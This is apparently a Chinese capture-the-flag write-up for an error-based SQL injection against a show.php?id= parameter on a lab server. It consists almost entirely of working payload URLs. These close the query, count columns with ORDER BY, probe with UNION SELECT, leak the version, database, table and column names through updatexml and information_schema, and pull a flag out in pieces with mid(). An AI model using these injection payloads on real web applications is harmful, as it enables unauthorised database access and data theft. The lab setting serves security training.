闭合
代码语言:javascript复制http://47.103.94.191:8034/show.php?id=33-- 
查列数
代码语言:javascript复制http://47.103.94.191:8034/show.php
?id=33 order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
查看回显
代码语言:javascript复制http://47.103.94.191:8034/show.php
?id=333 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
查看数据库名字、版本
代码语言:javascript复制http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,version(),0x7e,database(),0x7e),2)-- 
查看表名(这里对输出的个数有限制,因此使用limit进行限制)
代码语言:javascript复制http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='cms' limit 8,1),0x7e),2)-- 
查看列名
代码语言:javascript复制http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='cms' and table_name='this_is_flag' limit 1,1),0x7e),2)-- 
查看数据(这里由于flag太长了,无法一次显示,因此使用mid进行截断)
首先查看下flag的长度
代码语言:javascript复制http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select length(flag) from cms.this_is_flag),0x7e),2)-- 
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select mid(flag,1,10) from cms.this_is_flag),0x7e),2)--
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select mid(flag,11,20) from cms.this_is_flag),0x7e),2)--
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select mid(flag,21,30) from cms.this_is_flag),0x7e),2)-- flag
代码语言:javascript复制flag{16aeb3e6d73689bf456c5c50f2d04b84}
